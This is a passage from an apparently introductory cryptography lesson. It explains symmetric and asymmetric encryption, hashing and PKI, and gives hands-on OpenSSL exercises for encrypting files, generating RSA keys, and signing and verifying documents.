28 | 📌 **Example:** 29 | 🔐 Encrypt: 30 | `openssl enc -aes-256-cbc -salt -in file.txt -out file.enc -k secretkey` 31 | 32 | 🔓 Decrypt: 33 | `openssl enc -aes-256-cbc -d -in file.enc -out file_decrypted.txt -k secretkey` 34 | 35 | #### **🔹 Asymmetric Encryption (Public-Key Encryption)** 36 | - Uses **two keys**: 37 | - **Public Key (for encryption).** 38 | - **Private Key (for decryption).** 39 | - Slower but more secure. 40 | - Example: **RSA (Rivest-Shamir-Adleman).** 41 | 42 | 📌 **Example:** 43 | 🔐 Encrypt using a public key: 44 | `openssl rsautl -encrypt -pubin -inkey public.pem -in file.txt -out file.enc` 45 | 46 | 🔓 Decrypt using a private key: 47 | `openssl rsautl -decrypt -inkey private.pem -in file.enc -out file_decrypted.txt` 48 | 49 | --- 50 | 51 | ### **3️⃣ Hashing and Encryption** 52 | 🔹 **Encryption:** Converts plain text into ciphertext **(reversible process)**. 53 | 🔹 **Hashing:** Converts input into a fixed-length hash value **(irreversible process)**. 54 | 55 | #### **🔸 Hashing Algorithms (Used for Integrity)** 56 | - **MD5 (Message Digest Algorithm 5)** → 128-bit (Weak, avoid using). 57 | - **SHA-256 (Secure Hash Algorithm 256-bit)** → Stronger, widely used. 58 | 59 | 📌 **Example:** 60 | Generate SHA-256 hash of a file: 61 | `sha256sum file.txt` 62 | 63 | Verify a file’s integrity by comparing hashes. 64 | 65 | --- 66 | 67 | ### **4️⃣ Public Key Infrastructure (PKI)** 68 | PKI is a system of digital certificates and encryption keys that secure communication over the internet. 69 | 70 | 🔹 **Key Components:** 71 | - **Certificate Authority (CA):** Issues digital certificates. 72 | - **Public/Private Key Pair:** Used in encryption. 73 | - **Digital Signatures:** Used to verify authenticity. 74 | - **SSL/TLS:** Used for HTTPS encryption. 75 | 76 | 🔹 **How it Works:** 77 | 1. A website requests a certificate from a CA. 78 | 2. The CA verifies the website's identity and issues a digital certificate. 79 | 3. The certificate contains the website's public key. 80 | 4. When users visit the website, their browser encrypts data using this public key. 81 | 82 | --- 83 | 84 | ## **🛠 Activities: Hands-on Cryptography Exercises** 85 | 86 | ### **1️⃣ Encrypt and Decrypt Files Using OpenSSL** 87 | **Symmetric Encryption (AES-256):** 88 | ```bash 89 | # Encrypt a file 90 | openssl enc -aes-256-cbc -salt -in secret.txt -out secret.enc -k MyStrongPassword 91 | 92 | # Decrypt the file 93 | openssl enc -aes-256-cbc -d -in secret.enc -out secret_decrypted.txt -k MyStrongPassword 94 | ``` 95 | 96 | **Asymmetric Encryption (RSA):** 97 | ```bash 98 | # Generate RSA key pair 99 | openssl genpkey -algorithm RSA -out private.pem 100 | openssl rsa -pubout -in private.pem -out public.pem 101 | 102 | # Encrypt a file using the public key 103 | openssl rsautl -encrypt -pubin -inkey public.pem -in message.txt -out message.enc 104 | 105 | # Decrypt the file using the private key 106 | openssl rsautl -decrypt -inkey private.pem -in message.enc -out message_decrypted.txt 107 | ``` 108 | 109 | --- 110 | 111 | ### **2️⃣ Create and Verify Digital Signatures** 112 | **Step 1: Create a Private and Public Key** 113 | ```bash 114 | openssl genpkey -algorithm RSA -out private_key.pem 115 | openssl rsa -pubout -in private_key.pem -out public_key.pem 116 | ``` 117 | 118 | **Step 2: Sign a File** 119 | ```bash 120 | openssl dgst -sha256 -sign private_key.pem -out signature.bin document.txt 121 | ``` 122 | 123 | **Step 3: Verify the Signature** 124 | ```bash 125 | openssl dgst -sha256 -verify public_key.pem -signature signature.bin document.txt 126 | ``` 127 | 128 | 🔹 If the document is modified, the verification will fail, ensuring **integrity**. 129 | 130 | --- 131 | 132 | ## **Summary** 133 | ✔ Understand symmetric vs. asymmetric encryption. 134 | ✔ Use OpenSSL for encryption and decryption. 135 | ✔ Generate and verify hashes for integrity. 136 | ✔ Work with digital signatures and PKI. 137 | --------------------------------------------------------------------------------